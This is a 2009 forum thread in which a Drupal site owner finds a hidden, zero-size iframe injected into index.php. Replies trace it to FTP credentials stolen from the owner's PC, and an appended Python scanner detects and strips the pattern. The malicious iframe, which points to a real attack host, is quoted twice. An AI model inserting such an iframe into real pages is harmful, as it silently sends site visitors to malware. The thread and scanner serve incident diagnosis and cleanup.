chaiwei Posted October 22, 2009

Hi,

My website was showing a syntax error when I woke up this morning. I found out that my index.php in the www folder had this line:

```html
<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>
```

After that I went to this website: http://iqsp.ru:8080/index.php

It is a reported attack website. Is there any possible way to know why this happened? Can someone access my index.php?

btherl Posted October 22, 2009

Yes, it looks like you've been hacked. Have you downloaded and installed any scripts on your website? Or any forum software, guestbook software, etc etc?

trq Posted October 22, 2009

Many ways this could happen. We had an attack here at work the other week where someone had written JavaScript to our database, creating an XSS attack via an SQL injection.

Is this line of JavaScript actually hard coded into your index.php file or does it come from your database?

chaiwei Posted October 22, 2009 (Author)

Hi, thanks for the reply.

I am using Drupal and I have downloaded the Drupal module only. It is hardcoded in my index.php, because in Drupal's index.php they didn't close the PHP tag after opening it. My index.php looks like this:

```php
<?php
require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$return = menu_execute_active_handler();

// Menu status constants are integers; page content is a string.
if (is_int($return)) {
  switch ($return) {
    case MENU_NOT_FOUND:
      drupal_not_found();
      break;
    case MENU_ACCESS_DENIED:
      drupal_access_denied();
      break;
    case MENU_SITE_OFFLINE:
      drupal_site_offline();
      break;
  }
}
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page', $return);
}

drupal_page_footer();
<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>
```

So they inserted the iframe in the last line. So it causes a syntax error, because there is no closing PHP tag and there is nothing called <iframe in PHP.

chaiwei Posted October 22, 2009 (Author)

Does anyone have any idea how to deal with this? It is neither SQL injection nor JavaScript XSS; it is permanently hard coded into my index.php.

My index.php permission was set to 664 only.

What could have done this? Did they use PHP or something else to do that? Or did they hack into my other script and rewrite my index.php?

obay Posted October 22, 2009

Just "Find All" instances of that text in all your pages, then remove them. Upload your pages. Then change your password.

Gayner Posted October 22, 2009

> just "Find All" instances of that text in all your pages, then remove them. upload your pages. then change your password

Changing your password has nothing to do with this, but yeah, go ahead, change it again!

chaiwei Posted October 22, 2009 (Author)

It looks like my personal computer is infected by a virus. According to my hosting provider:

> Your personal computer is most probably affected. Yes, the virus is getting the password from your local computer. Yes, the files listed above have been modified over FTP.

I am really weak on the security side. So could the virus have stolen my FTP password from inside my computer? I am using FileZilla and EditPlus.

So is this called phishing?

btherl Posted October 22, 2009

Ok, the important part of what they said is "the files listed have been modified over FTP". That means access was made using your username and password.

Have you got antivirus software installed? If not, you should install that. You should also make sure your computer has all the automatic updates from Windows Update. If you have trouble cleaning the virus, it's best if you go to a forum that specializes in these things.

And of course you should change your password. Change it now, and then change it again after you're sure there's no viruses left on your computer.

Gayner Posted October 22, 2009

> after you're sure there's no viruses left on your computer.

In Jesus's name, amen.
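
The "Find All" clean-up suggested in the thread, written out as an added example that is not part of any post above: a Python scanner that walks a site directory for the hidden-iframe shape quoted in the first post and can strip it. It generalises the pattern to any URL; the function names, the sample file contents and the `injected.example` host are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Shape of the injection quoted in this thread: an <iframe> whose onload
# handler assigns this.src and zeroes its own size. Any URL is accepted.
INJECTED_IFRAME = re.compile(
    r"""<iframe\b[^>]*\bonload\s*=\s*"[^"]*this\.src\s*=\s*'(?P<url>[^']+)'"""
    r"""[^"]*this\.(?:height|width)\s*=\s*'0'[^"]*"[^>]*>.*?</iframe>""",
    re.IGNORECASE | re.DOTALL,
)
SCAN_SUFFIXES = {".php", ".inc", ".html", ".htm", ".tpl", ".js"}


def scan_tree(root):
    """Return (relative path, line number, iframe URL) for each hit under root."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in INJECTED_IFRAME.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((path.relative_to(root).as_posix(), line_no, m.group("url")))
    return hits


def strip_injection(text):
    """Return (text with injected iframes removed, number removed)."""
    return INJECTED_IFRAME.subn("", text)


# Constructed sample: a PHP file with the injection appended after the last
# statement (no closing ?> tag, as in the thread) and a harmless page.
SAMPLE_INFECTED = (
    "<?php\nprint 'hello';\n"
    "<iframe frameborder=\"0\" onload=\"if (!this.src){ "
    "this.src='http://injected.example:8080/index.php'; "
    "this.height='0'; this.width='0';}\" >abcdefgh</iframe>\n"
)
SAMPLE_CLEAN = '<iframe src="https://maps.example/embed" width="600"></iframe>\n'


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(SAMPLE_INFECTED, encoding="utf-8")
        (root / "about.html").write_text(SAMPLE_CLEAN, encoding="utf-8")
        return scan_tree(root)
```

Stripping the line only undoes the symptom: the replies above establish that the files were changed over FTP with the account's own credentials, so the scan is worth re-running after the password change.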